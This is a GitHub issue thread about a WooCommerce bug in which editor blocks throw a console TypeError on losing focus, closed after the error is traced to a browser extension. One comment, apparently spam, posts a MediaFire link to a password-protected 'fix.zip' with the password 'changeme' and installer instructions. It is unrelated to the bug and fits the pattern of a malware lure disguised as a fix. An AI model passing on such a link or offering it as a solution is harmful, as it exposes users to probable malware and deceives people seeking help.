### ISSUE TITLE
When blocks lose focus an error is thrown

### ISSUE THREAD

**Issue by octaedro** [woothemes/woocommerce#50959]
### Prerequisites

- [ ] I have carried out troubleshooting steps and I believe I have found a bug.
- [ ] I have searched for similar bugs in both open and closed issues and cannot find a duplicate.

### Describe the bug

When a block loses the focus, a console error is thrown:
```
page.bundle.js:1 Uncaught TypeError: t.toString is not a function
    at ae.stringifyFunction (page.bundle.js:1:1448)
    at s (page.bundle.js:1:2855)
    at s (page.bundle.js:1:4383)
    at s (page.bundle.js:1:4383)
    at s (page.bundle.js:1:4383)
    at s (page.bundle.js:1:4383)
    at s (page.bundle.js:1:4383)
    at s (page.bundle.js:1:4383)
    at s (page.bundle.js:1:4383)
    at s (page.bundle.js:1:4383)
```

https://github.com/user-attachments/assets/d4cf5f30-4954-4881-b428-52805f844a42

### Expected behavior

When a block loses the focus, no error should be thrown.

### Actual behavior

When blocks lose focus, an error is thrown.

### Steps to reproduce

1. Go to Posts > Add New Posts
2. Open the browser's console and add a block.
3. Try to add another block.
4. Verify that after the block loses the focus a console error like the following is shown

![Screenshot 2024-08-26 at 11 07 05 AM](https://github.com/user-attachments/assets/13747beb-4191-4b75-820f-a5149b382f77)

### WordPress Environment

It's happening on `trunk`.

### Isolating the problem

- [X] I have deactivated other plugins and confirmed this bug occurs when only WooCommerce plugin is active.
- [X] This bug happens with a default WordPress theme active, or [Storefront](https://woocommerce.com/products/storefront/).
- [X] I can reproduce this bug consistently using the steps above.

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by octaedro** [comment]
I'm closing this issue because the error is related to the [Chrome Extension: Redux DevTools](https://github.com/WordPress/gutenberg/issues/59917) and is happening at GB level.
